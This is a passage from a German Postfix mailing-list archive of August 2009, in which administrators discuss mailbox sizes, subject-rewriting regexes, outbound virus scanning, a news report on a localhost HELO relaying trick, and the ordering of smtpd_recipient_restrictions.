[Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <200908060937.16687@inter.netz> References: <200908052030.50317.p.heinlein@heinlein-support.de> <200908060924.32592.s.schmidt@jacobs-university.de> <200908060937.16687@inter.netz> Message-ID: <4A7A8BE1.7070508@riscworks.net> thus Andre Tann spake: > Stefan Schmidt, Donnerstag 06 August 2009: > >> Meine Mailbox privat liegt bei 5.5GB, dienstlich um 4 GB. na und? > > Äh... ich hab hier Kunden, die schicken ständig Druckunterlagen hin > und her. Jede Mail 10 MB, das summiert sich. 20 GB, auch mal 30 GB > für die Mailbox, das kommt dauernd vor. Das ist doch gar nicht so > furchtbar viel...? In dem Verlag, wo ich bis Ende 2007 die IT-Leitung hatte, bauten wir genau für solche Fälle ein lustiges, auf (S)FTP aufsetzendes, automatisiertes Framework. Allerdings war bei uns der Auslöser nicht eine 10MiBybte eMail (das wäre noch an der Grenze gewesen, wir hatten message_size_limit auf 20MiByte gesetzt, sondern ein Grafiker, der meinte, er müßte das 600MiByte große TIFF, welches das Cover für unser Hochglanzmagazin darstellte, per eMail nach sonstwo versenden und die Beschwerde seinerseits, daß das nie ankäm... Timo From driessen at fblan.de Thu Aug 6 10:11:03 2009 From: driessen at fblan.de (Uwe Driessen) Date: Thu, 6 Aug 2009 10:11:03 +0200 Subject: [Postfixbuch-users] Virenscan + Spamscan bei ausgehenden Mails In-Reply-To: <4A7A7D5C.9080401@tcu.de> References: <4A79B38E.9030302@puersten.de> <4A7A7502.30206@puersten.de> <4A7A7D5C.9080401@tcu.de> Message-ID: <000f01ca166d$712d7010$0565a8c0@uwe> On Behalf Of R. Lemmermann > > Hallo > > > Mal ganz platt gefragt: > Wo häng ich das in der Postfix-Konfiguration ein? Was ?? > > Gruss Reiner Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From tschosie at gmx.de Thu Aug 6 10:10:26 2009 From: tschosie at gmx.de (Josef Kovacs) Date: Thu, 06 Aug 2009 10:10:26 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <20090806074459.GE27540@charite.de> References: <200908052030.50317.p.heinlein@heinlein-support.de> <20090806074459.GE27540@charite.de> Message-ID: <4A7A8FF2.9070503@gmx.de> Servus, Ralf Hildebrandt schrieb: >> Größte Anzahl von AW: AW: AW: AW: AW im Betreff: > Dafür habe ich eine regexp, die das fixt: > > # Outlook Re: AW: Re: AW: Muell reparieren! > /^Subject: ((re|aw):\s+){2,}(.+)/ REPLACE Subject: Re: $3 Wo gibst Du diese Zeile an dass diese automatisch abgearbeitet wird? Danke im voraus Tschosie From kai_postfix at fuerstenberg.ws Thu Aug 6 10:11:14 2009 From: kai_postfix at fuerstenberg.ws (=?ISO-8859-1?Q?Kai_F=FCrstenberg?=) Date: Thu, 06 Aug 2009 10:11:14 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <4A7A1B61.10209@bricart.de> References: <200908052030.50317.p.heinlein@heinlein-support.de> <4A7A1B61.10209@bricart.de> Message-ID: <4A7A9022.3010000@fuerstenberg.ws> Christian Bricart schrieb am 06.08.2009 01:53: >> Kompliziertestes Passwort: > mein eigenes bestimmt ;-) Sicher? Mein Root-Passwort auf dem heimischen Server besteht aus mehr als 25 Zeichen (genaue Zahl sag ich nicht). Kleinbuchstaben, Großbuchstaben, Sonderzeichen und Zahlen in einer völlig unsortierten Reihe. Hab 3 Monate gebraucht, bis ich es auswendig kannte :-D Ansonsten ist Vorgabe bei IMAP/POP: 12 Zeichen mit 2 von obigen Merkmalen, 9 Zeichen mit 3 Merkmalen oder 6 Zeichen mit allen 4. -- Kai Fürstenberg PM an: kai at fuerstenberg punkt ws From thomas at gelf.net Thu Aug 6 10:13:36 2009 From: thomas at gelf.net (Thomas Gelf) Date: Thu, 06 Aug 2009 10:13:36 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <20090806074459.GE27540@charite.de> References: <200908052030.50317.p.heinlein@heinlein-support.de> <20090806074459.GE27540@charite.de> Message-ID: Ralf Hildebrandt schrieb: >> Größte Anzahl von AW: AW: AW: AW: AW im Betreff: > Dafür habe ich eine regexp, die das fixt: > > # Outlook Re: AW: Re: AW: Muell reparieren! > /^Subject: ((re|aw):\s+){2,}(.+)/ REPLACE Subject: Re: $3 Vorschlag: /^Subject: ((re|aw):\s+){2,}(.+)/ REPLACE Subject: $2: $3 From Ralf.Hildebrandt at charite.de Thu Aug 6 10:16:08 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Thu, 6 Aug 2009 10:16:08 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <4A7A8FF2.9070503@gmx.de> References: <200908052030.50317.p.heinlein@heinlein-support.de> <20090806074459.GE27540@charite.de> <4A7A8FF2.9070503@gmx.de> Message-ID: <20090806081608.GO27540@charite.de> * Josef Kovacs : > Servus, > > Ralf Hildebrandt schrieb: > >> Größte Anzahl von AW: AW: AW: AW: AW im Betreff: > > Dafür habe ich eine regexp, die das fixt: > > > > # Outlook Re: AW: Re: AW: Muell reparieren! > > /^Subject: ((re|aw):\s+){2,}(.+)/ REPLACE Subject: Re: $3 > > Wo gibst Du diese Zeile an dass diese automatisch abgearbeitet wird? Wo taucht denn die Zeile "Subject:" in einer Mail auf? -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From p.heinlein at heinlein-support.de Thu Aug 6 10:28:52 2009 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Thu, 6 Aug 2009 10:28:52 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <4A7A1B61.10209@bricart.de> References: <200908052030.50317.p.heinlein@heinlein-support.de> <4A7A1B61.10209@bricart.de> Message-ID: <200908061028.53097.p.heinlein@heinlein-support.de> Am Donnerstag 06 August 2009 schrieb Christian Bricart: > > Eigentlich mal ein Fall für ein Postfachquartett. So statt Motor > > und Leistung wie beim Autoquartett geht es nach > > > > Anzahl IMAP-Folder: > > ca. 12.000 bei knapp 3000 Usern > > > Anzahl Mails gesamt: > > .. "find -type f | wc -l" muss glaub ich noch bis morgen daran > knabbern.. da es eine eigene Partition ist, gehe ich mal über "df": Ich meine das im Sinne des Quartetts jeweils für DAS POSTFACH, nicht für DEN SERVER. Mit freundlichen Grüßen Peer Heinlein -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Tel: 030-405051-42 Fax: 030-405051-19 Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From thomas at gelf.net Thu Aug 6 10:28:43 2009 From: thomas at gelf.net (Thomas Gelf) Date: Thu, 06 Aug 2009 10:28:43 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <20090806074459.GE27540@charite.de> References: <200908052030.50317.p.heinlein@heinlein-support.de> <20090806074459.GE27540@charite.de> Message-ID: Ralf Hildebrandt schrieb: >> Größte Anzahl von AW: AW: AW: AW: AW im Betreff: > Dafür habe ich eine regexp, die das fixt: > > # Outlook Re: AW: Re: AW: Muell reparieren! > /^Subject: ((re|aw):\s+){2,}(.+)/ REPLACE Subject: Re: $3 Doofe Frage: wie handhabst du das bei DKIM-signierten Mails? From thomas at gelf.net Thu Aug 6 10:45:50 2009 From: thomas at gelf.net (Thomas Gelf) Date: Thu, 06 Aug 2009 10:45:50 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <4A7A9022.3010000@fuerstenberg.ws> References: <200908052030.50317.p.heinlein@heinlein-support.de> <4A7A1B61.10209@bricart.de> <4A7A9022.3010000@fuerstenberg.ws> Message-ID: Kai Fürstenberg schrieb: > Christian Bricart schrieb am 06.08.2009 01:53: >>> Kompliziertestes Passwort: >> mein eigenes bestimmt ;-) > > Sicher? Mein Root-Passwort auf dem heimischen Server besteht aus mehr > als 25 Zeichen (genaue Zahl sag ich nicht). Kleinbuchstaben, > Großbuchstaben, Sonderzeichen und Zahlen in einer völlig unsortierten > Reihe. Hab 3 Monate gebraucht, bis ich es auswendig kannte :-D /etc/shadow: root:!:14000:0:99999:7::: /etc/ssh/sshd_config: PermitRootLogin without-password Wer will schon Kennwörter??? > Ansonsten ist Vorgabe bei IMAP/POP: 12 Zeichen mit 2 von obigen > Merkmalen, 9 Zeichen mit 3 Merkmalen oder 6 Zeichen mit allen 4. Und dann noch mit crypt (Standard DES) hashen und wundern, weshalb das Login auch dann klappt, wenn man sich bei den letzten Zeichen vertippt ;-) From philipp at phflesch.de Thu Aug 6 11:09:15 2009 From: philipp at phflesch.de (Philipp Flesch) Date: Thu, 06 Aug 2009 11:09:15 +0200 Subject: [Postfixbuch-users] Virenscan + Spamscan bei ausgehenden Mails In-Reply-To: <000f01ca166d$712d7010$0565a8c0@uwe> References: <4A79B38E.9030302@puersten.de> <4A7A7502.30206@puersten.de> <4A7A7D5C.9080401@tcu.de> <000f01ca166d$712d7010$0565a8c0@uwe> Message-ID: <4A7A9DBB.3090200@phflesch.de> Uwe Driessen schrieb: > On Behalf Of R. Lemmermann > >> Hallo >> >> >> Mal ganz platt gefragt: >> Wo häng ich das in der Postfix-Konfiguration ein? >> > > Was ?? > amavisd-new scannt eigentlich JEDE Mail, die Postfix passiert (und nicht explizit ausgeschlossen ist). From r.lemmermann at tcu.de Thu Aug 6 11:21:24 2009 From: r.lemmermann at tcu.de (R. Lemmermann) Date: Thu, 06 Aug 2009 11:21:24 +0200 Subject: [Postfixbuch-users] Virenscan + Spamscan bei ausgehenden Mails In-Reply-To: <000f01ca166d$712d7010$0565a8c0@uwe> References: <4A79B38E.9030302@puersten.de> <4A7A7502.30206@puersten.de> <4A7A7D5C.9080401@tcu.de> <000f01ca166d$712d7010$0565a8c0@uwe> Message-ID: <4A7AA094.8000106@tcu.de> Uwe Driessen schrieb: > On Behalf Of R. Lemmermann >> Hallo >> >> >> Mal ganz platt gefragt: >> Wo häng ich das in der Postfix-Konfiguration ein? > > Was ?? > Na die Virenprüfung für ausgehende Mails. Mails die an den Cyrus-Imap gehen werden geprüft, aber die ausgehenden nicht (... t'schuldigung - aber ich will mich ja bessern ). Gruss Reiner From kai_postfix at fuerstenberg.ws Thu Aug 6 11:27:26 2009 From: kai_postfix at fuerstenberg.ws (=?ISO-8859-1?Q?Kai_F=FCrstenberg?=) Date: Thu, 06 Aug 2009 11:27:26 +0200 Subject: [Postfixbuch-users] Virenscan + Spamscan bei ausgehenden Mails In-Reply-To: <4A7AA094.8000106@tcu.de> References: <4A79B38E.9030302@puersten.de> <4A7A7502.30206@puersten.de> <4A7A7D5C.9080401@tcu.de> <000f01ca166d$712d7010$0565a8c0@uwe> <4A7AA094.8000106@tcu.de> Message-ID: <4A7AA1FE.4020604@fuerstenberg.ws> R. Lemmermann schrieb am 06.08.2009 11:21: > Mails die an den Cyrus-Imap gehen werden geprüft, aber die ausgehenden > nicht (... t'schuldigung - aber ich will mich ja bessern ). Hast du evtl. die Prüfung in der Master.cf unter smtpd eingetragen? Wenn deine User über submission gehen, greift die Einstellung nicht. -- Kai Fürstenberg PM an: kai at fuerstenberg punkt ws From p.heinlein at heinlein-support.de Thu Aug 6 11:50:00 2009 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Thu, 6 Aug 2009 11:50:00 +0200 Subject: [Postfixbuch-users] Virenscan + Spamscan bei ausgehenden Mails In-Reply-To: <4A7AA094.8000106@tcu.de> References: <4A79B38E.9030302@puersten.de> <000f01ca166d$712d7010$0565a8c0@uwe> <4A7AA094.8000106@tcu.de> Message-ID: <200908061150.00286.p.heinlein@heinlein-support.de> Am Donnerstag 06 August 2009 schrieb R. Lemmermann: > Mails die an den Cyrus-Imap gehen werden geprüft, aber die > ausgehenden nicht (... t'schuldigung - aber ich will mich ja bessern > ). main.cf und master.cf posten, sonst kann man nicht sagen wo Du was ändern mußt. Mit freundlichen Grüßen Peer Heinlein -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Tel: 030-405051-42 Fax: 030-405051-19 Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From lists at puersten.de Thu Aug 6 13:45:56 2009 From: lists at puersten.de (=?ISO-8859-15?Q?Oliver_P=FCrsten?=) Date: Thu, 06 Aug 2009 13:45:56 +0200 Subject: [Postfixbuch-users] =?iso-8859-15?q?OT=3A_Namens-Trick_=F6ffnet_M?= =?iso-8859-15?q?ailserver?= Message-ID: <4A7AC274.4060208@puersten.de> Moin, für alle die es noch nicht gelesen haben: http://www.heise.de/newsticker/Namens-Trick-oeffnet-Mailserver--/meldung/143123 Würde mich ja mal interessieren was für Mailserver denn Relaying anhand von Namen bzw. Hostnamen erlauben und nicht anhand der IP Adressen? Wenn ich das richtig verstehe dann würde das ja quasi vergleichbar bedeuten das man in den mynetworks einen Hostnamen einträgt, genau localhost und das wiederrum ist dann die Schwachstelle. Versteh ich das jetzt richtig? Gruß in die Runde Oliver From Ralf.Hildebrandt at charite.de Thu Aug 6 13:58:07 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Thu, 6 Aug 2009 13:58:07 +0200 Subject: [Postfixbuch-users] =?utf-8?q?OT=3A_Namens-Trick_=C3=B6ffnet_Mail?= =?utf-8?q?server?= In-Reply-To: <4A7AC274.4060208@puersten.de> References: <4A7AC274.4060208@puersten.de> Message-ID: <20090806115807.GM9229@charite.de> * Oliver Pürsten : > Moin, > > für alle die es noch nicht gelesen haben: > > http://www.heise.de/newsticker/Namens-Trick-oeffnet-Mailserver--/meldung/143123 > > Würde mich ja mal interessieren was für Mailserver denn Relaying anhand von > Namen bzw. Hostnamen erlauben und nicht anhand der IP Adressen? Schlechte. > Wenn ich das richtig verstehe dann würde das ja quasi vergleichbar > bedeuten das man in den mynetworks einen Hostnamen einträgt, genau > localhost und das wiederrum ist dann die Schwachstelle. Versteh ich das > jetzt richtig? Ja, aber da localhost auf 127.0.0.1 auflöst und nicht 123.27.3.81, 222.252.80.188 oder 123.16.13.188 resultiert als hostnamer "unknown". Gähn. Der ist 10 Jahre alt. Muss wohl Sommerloch sein. -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From kai_postfix at fuerstenberg.ws Thu Aug 6 13:58:44 2009 From: kai_postfix at fuerstenberg.ws (=?ISO-8859-1?Q?Kai_F=FCrstenberg?=) Date: Thu, 06 Aug 2009 13:58:44 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?OT=3A_Namens-Trick_=F6ffnet_Ma?= =?iso-8859-1?q?ilserver?= In-Reply-To: <4A7AC274.4060208@puersten.de> References: <4A7AC274.4060208@puersten.de> Message-ID: <4A7AC574.8020502@fuerstenberg.ws> Hi, Oliver Pürsten schrieb am 06.08.2009 13:45: > für alle die es noch nicht gelesen haben: > > http://www.heise.de/newsticker/Namens-Trick-oeffnet-Mailserver--/meldung/143123 kannte ich noch nicht, aber interessant ... > Würde mich ja mal interessieren was für Mailserver denn Relaying anhand von > Namen bzw. Hostnamen erlauben und nicht anhand der IP Adressen? > > Wenn ich das richtig verstehe dann würde das ja quasi vergleichbar bedeuten das man in den > mynetworks einen Hostnamen einträgt, genau localhost und das wiederrum ist dann die > Schwachstelle. Versteh ich das jetzt richtig? Genau. Nur kannst du dem Postfix keine Hostnamen in mynetworks unterjubeln: http://www.postfix.org/postconf.5.html#mynetworks Specify a list of network addresses or network/netmask patterns, separated by commas and/or whitespace. Insofern ist Postfix davon nicht betroffen, außer du würdest explizit eine Restiction dafür schreiben. -- Kai Fürstenberg PM an: kai at fuerstenberg punkt ws From Ralf.Hildebrandt at charite.de Thu Aug 6 13:59:36 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Thu, 6 Aug 2009 13:59:36 +0200 Subject: [Postfixbuch-users] =?utf-8?q?OT=3A_Namens-Trick_=C3=B6ffnet_Mail?= =?utf-8?q?server?= In-Reply-To: <20090806115807.GM9229@charite.de> References: <4A7AC274.4060208@puersten.de> <20090806115807.GM9229@charite.de> Message-ID: <20090806115935.GN9229@charite.de> * Ralf Hildebrandt : > * Oliver Pürsten : > > Moin, > > > > für alle die es noch nicht gelesen haben: > > > > http://www.heise.de/newsticker/Namens-Trick-oeffnet-Mailserver--/meldung/143123 > > > > Würde mich ja mal interessieren was für Mailserver denn Relaying anhand von > > Namen bzw. Hostnamen erlauben und nicht anhand der IP Adressen? > > Schlechte. Natürlich geht das auch mit Postfix, aber der Hostname würde durch forward & reverse Lookup verifiziert. -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From p.heinlein at heinlein-support.de Thu Aug 6 14:40:58 2009 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Thu, 6 Aug 2009 14:40:58 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?OT=3A_Namens-Trick_=F6ffnet_Ma?= =?iso-8859-1?q?ilserver?= In-Reply-To: <4A7AC274.4060208@puersten.de> References: <4A7AC274.4060208@puersten.de> Message-ID: <200908061440.58497.p.heinlein@heinlein-support.de> Am Donnerstag 06 August 2009 schrieb Oliver Pürsten: > Würde mich ja mal interessieren was für Mailserver denn Relaying > anhand von Namen bzw. Hostnamen erlauben und nicht anhand der IP > Adressen? Die gleichen Server, die ein relaying für alle Server mit der eigenen Domain im HELO-Hostnamen erlauben, und am Empfang ihrer eigenen Mailadresse von außen jedoch rejecten. > Wenn ich das richtig verstehe dann würde das ja quasi vergleichbar > bedeuten das man in den mynetworks einen Hostnamen einträgt, genau > localhost und das wiederrum ist dann die Schwachstelle. Versteh ich > das jetzt richtig? Nicht in mynetworks. In eine client-access-Datei. Mit freundlichen Grüßen Peer Heinlein -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Tel: 030-405051-42 Fax: 030-405051-19 Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From atann at alphasrv.net Thu Aug 6 16:03:31 2009 From: atann at alphasrv.net (Andre Tann) Date: Thu, 6 Aug 2009 16:03:31 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?OT=3A_Namens-Trick_=F6ffnet_Ma?= =?iso-8859-1?q?ilserver?= In-Reply-To: <200908061440.58497.p.heinlein@heinlein-support.de> References: <4A7AC274.4060208@puersten.de> <200908061440.58497.p.heinlein@heinlein-support.de> Message-ID: <200908061603.31949@inter.netz> Peer Heinlein, Donnerstag 06 August 2009: > Nicht in mynetworks. In eine client-access-Datei. Wie kann man denn die Client-IP fälschen? mE müßte das in eine check_helo_access-Datei rein, und da habe ich u.a. drinstehen: localhost 554 Own HELO Name rejected [127.0.0.1] 554 Own HELO Name rejected 127.0.0.1 554 Own HELO Name rejected [meine-ip] 554 Own HELO Name rejected meine-ip 554 Own HELO Name rejected [mydomain] 554 Own HELO Name rejected mydomain 554 Own HELO Name rejected -- Andre Tann From p.heinlein at heinlein-support.de Thu Aug 6 16:18:50 2009 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Thu, 6 Aug 2009 16:18:50 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?OT=3A_Namens-Trick_=F6ffnet_Ma?= =?iso-8859-1?q?ilserver?= In-Reply-To: <200908061603.31949@inter.netz> References: <4A7AC274.4060208@puersten.de> <200908061440.58497.p.heinlein@heinlein-support.de> <200908061603.31949@inter.netz> Message-ID: <200908061618.50505.p.heinlein@heinlein-support.de> Am Donnerstag 06 August 2009 schrieb Andre Tann: > Peer Heinlein, Donnerstag 06 August 2009: > > Nicht in mynetworks. In eine client-access-Datei. > > Wie kann man denn die Client-IP fälschen? mE müßte das in eine > check_helo_access-Datei rein, und da habe ich u.a. drinstehen: Ja. *DU*. Andere haben da: > localhost PERMIT "Meine Server dürfen immer" Mit freundlichen Grüßen Peer Heinlein -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Tel: 030-405051-42 Fax: 030-405051-19 Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From atann at alphasrv.net Thu Aug 6 16:21:25 2009 From: atann at alphasrv.net (Andre Tann) Date: Thu, 6 Aug 2009 16:21:25 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?OT=3A_Namens-Trick_=F6ffnet_Ma?= =?iso-8859-1?q?ilserver?= In-Reply-To: <200908061618.50505.p.heinlein@heinlein-support.de> References: <4A7AC274.4060208@puersten.de> <200908061603.31949@inter.netz> <200908061618.50505.p.heinlein@heinlein-support.de> Message-ID: <200908061621.25257@inter.netz> Peer Heinlein, Donnerstag 06 August 2009: > Ja. > > *DU*. > > Andere haben da: > > localhost PERMIT "Meine Server dürfen immer" ...ich hatte Dich so verstanden, daß Du das in eine check_client_access reinpacken willst. Aber dann sind wir uns ja einig. -- Andre Tann From trashcan at odo.in-berlin.de Sun Aug 9 18:37:53 2009 From: trashcan at odo.in-berlin.de (Michael Grimm) Date: Sun, 9 Aug 2009 18:37:53 +0200 Subject: [Postfixbuch-users] Reihenfolge von Black-/Whitelisting und reject_unauth_destination in smtpd_recipient_restrictions Message-ID: Moin, moin - Vor einem halben Jahr habe ich den Schritt von Exim nach Postfix durchgeführt. Habe mir das Buch gekauft und die Konfiguration damit vorgenommen. Alles läuft sehr zu meiner Zufriedenheit. Ich habe nur ein prinzipielles Verständnisproblem bezüglich des Kapitels 8.8, in dem es um die smtpd_recipient_restrictions geht, und insbesondere um die Reihenfolge der einzelnen Tests, die man ja auch nur dann ändern solle, wenn man wisse, was man täte. Da ich mir diesbezüglich unsicher bin, frage ich hier ;-) Hier mein diesbezüglicher Aufbau in meiner main.cf: smtpd_recipient_restrictions = check_sender_access pcre:/usr/local/etc/postfix/access_sender, reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_unknown_sender_domain, reject_unknown_recipient_domain, permit_sasl_authenticated, permit_mynetworks, reject_unlisted_recipient, warn_if_reject reject_unauth_pipelining, warn_if_reject reject_invalid_helo_hostname, check_policy_service inet:127.0.0.1:10023, warn_if_reject reject_rbl_client ix.dnsbl.manitu.net, warn_if_reject reject_rbl_client sbl.spamhaus.org, warn_if_reject reject_rbl_client xbl.spamhaus.org, warn_if_reject reject_rbl_client cbl.abuseat.org, warn_if_reject reject_rhsbl_client blackhole.securitysage.com, reject_unverified_recipient, permit_mx_backup, reject_unauth_destination, permit In check_sender_access geht es um Einträge à la: /^junkmail at unwanted\.tld/ HOLD (HOLD solange, bis ich mir sicher bin, mit einem REJECT keinen Schaden anzurichten; sind unerwünschte und von anderen abonnierte Newsletter) Mein Verständnisproblem liegt nun in der späten Überprüfung reject_unauth_destination und dem empfohlenen White-/Black- Listing ganz zu Beginn der smtpd_recipient_restrictions. Sollte dieser Relaycheck nicht relativ weit vorne erfolgen? Öffnete ich nicht meinen Server hinsichtlich Relaying, wenn ich bspw. in check_sender_access ein OK vergäbe? Hmm. Hintergrund meiner Fragen ist: Ich möchte gerne ein paar Absenderadressen zur Sicherheit hinsichtlich gerade getesteter RBL checks whitelisten. Wo ist mein Denkfehler? Schon einmal vielen Dank, Michael From p.heinlein at heinlein-support.de Sun Aug 9 19:07:41 2009 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Sun, 9 Aug 2009 19:07:41 +0200 Subject: [Postfixbuch-users] Reihenfolge von Black-/Whitelisting und reject_unauth_destination in smtpd_recipient_restrictions In-Reply-To: References: Message-ID: <200908091907.41413.p.heinlein@heinlein-support.de> Am Sonntag, 9. August 2009 schrieb Michael Grimm: > In check_sender_access geht es um Einträge à la: > > /^junkmail at unwanted\.tld/ HOLD > > (HOLD solange, bis ich mir sicher bin, mit einem REJECT > keinen Schaden anzurichten; sind unerwünschte und von > anderen abonnierte Newsletter) Naja, da Du ja einzelne spezielle Mailadressen sperrst dürfte das Risiko aus Versehen jemanden zu sperren wohl eher sehr gering sein. Aus irgendeinem Grund willst Du ja diese Absender sperren, das sind ja dann wohl nicht irgendwelche Adressen. > Listing ganz zu Beginn der smtpd_recipient_restrictions. Sollte > dieser Relaycheck nicht relativ weit vorne erfolgen? Öffnete ich > nicht meinen Server hinsichtlich Relaying, wenn ich bspw. in > check_sender_access ein OK vergäbe? Hmm. Wenn Du ein OK in den sender_access_vergibst dann ja. Ist irgendwo im Buch auch erwähnt: HELO und SENDER nicht nicht grundsätzlich erstmal nicht geeignet um ein Whitelisting (!) darauf zu machen. Was Du jedoch gefahrlos machen kannst ist, daß Du dort ein "permit_auth_destination" vergibst. Denn in den access-Map kannst Du prinzipiell alle Restrictions aufführen (das ist im Buch leider nicht so deutlich erklärt). Statt eines OK (=Nimm die Mail an, egal wohin) kannst Du also ein "permit_auth_destination (=nimm die Mail an wenn an uns) nutzen. > Wo ist mein Denkfehler? Nirgendwo. Du hast recht und das Problem sauber erkant. Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein  -- Sitz: Berlin From driessen at fblan.de Sun Aug 9 19:15:52 2009 From: driessen at fblan.de (Uwe Driessen) Date: Sun, 9 Aug 2009 19:15:52 +0200 Subject: [Postfixbuch-users] Reihenfolge von Black-/Whitelisting undreject_unauth_destination in smtpd_recipient_restrictions In-Reply-To: References: Message-ID: <007901ca1915$0cbcae20$0565a8c0@uwe> On Behalf Of Michael Grimm > Moin, moin - > > Vor einem halben Jahr habe ich den Schritt von Exim nach Postfix > durchgeführt. Habe mir das Buch gekauft und die Konfiguration > damit vorgenommen. Alles läuft sehr zu meiner Zufriedenheit. > > Ich habe nur ein prinzipielles Verständnisproblem bezüglich des > Kapitels 8.8, in dem es um die smtpd_recipient_restrictions geht, > und insbesondere um die Reihenfolge der einzelnen Tests, die man > ja auch nur dann ändern solle, wenn man wisse, was man täte. Da > ich mir diesbezüglich unsicher bin, frage ich hier ;-) > > Hier mein diesbezüglicher Aufbau in meiner main.cf: Besser ist hier ein postconf -n > > smtpd_recipient_restrictions = > check_sender_access pcre:/usr/local/etc/postfix/access_sender, > reject_non_fqdn_sender, > reject_non_fqdn_recipient, > reject_unknown_sender_domain, > reject_unknown_recipient_domain, > permit_sasl_authenticated, > permit_mynetworks, > reject_unlisted_recipient, > warn_if_reject reject_unauth_pipelining, > warn_if_reject reject_invalid_helo_hostname, > check_policy_service inet:127.0.0.1:10023, > warn_if_reject reject_rbl_client ix.dnsbl.manitu.net, > warn_if_reject reject_rbl_client sbl.spamhaus.org, > warn_if_reject reject_rbl_client xbl.spamhaus.org, > warn_if_reject reject_rbl_client cbl.abuseat.org, > warn_if_reject reject_rhsbl_client blackhole.securitysage.com, > reject_unverified_recipient, > permit_mx_backup, > reject_unauth_destination, > permit > > In check_sender_access geht es um Einträge à la: > > /^junkmail at unwanted\.tld/ HOLD > > (HOLD solange, bis ich mir sicher bin, mit einem REJECT > keinen Schaden anzurichten; sind unerwünschte und von > anderen abonnierte Newsletter) Ein sauberes reject macht weniger schaden wie eine vergessene Mail in der Holdqueue. Die Frage ist wie ist die Policy für den Server? Eigentlich gibt es nur annehmen oder ablehnen (aus welchem Grund auch immer) alles andere ist eigentlich Flickwerk am Problem vorbei. > > Mein Verständnisproblem liegt nun in der späten Überprüfung > reject_unauth_destination und dem empfohlenen White-/Black- > Listing ganz zu Beginn der smtpd_recipient_restrictions. Sollte > dieser Relaycheck nicht relativ weit vorne erfolgen? Öffnete ich > nicht meinen Server hinsichtlich Relaying, wenn ich bspw. in Nö eigentlich nicht > check_sender_access ein OK vergäbe? Hmm. Ein Ok bekommt nur der den ich auf mehrere Arten eindeutig identifizieren kann (z.B. feste IP) > > Hintergrund meiner Fragen ist: Ich möchte gerne ein paar > Absenderadressen zur Sicherheit hinsichtlich gerade getesteter > RBL checks whitelisten. Und wo ist das Problem? kennst du den Server, weist du das dieser Server für dich sicher ist, willst du dessen Mails haben dann bleibt dir kein anderer Weg wie diesen vor den RBL's mit OK anzunehmen. ( da deine RBL's aber alle nur mit warn_if_reject laufen werden diese Server eh nicht abgelehnt) > > Wo ist mein Denkfehler? > Bei Postfix nicht um die Ecke denken sondern einfach und logisch der Reihe nach genau so arbeitet Postfix. Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From Ralf.Hildebrandt at charite.de Mon Aug 10 09:48:07 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Mon, 10 Aug 2009 09:48:07 +0200 Subject: 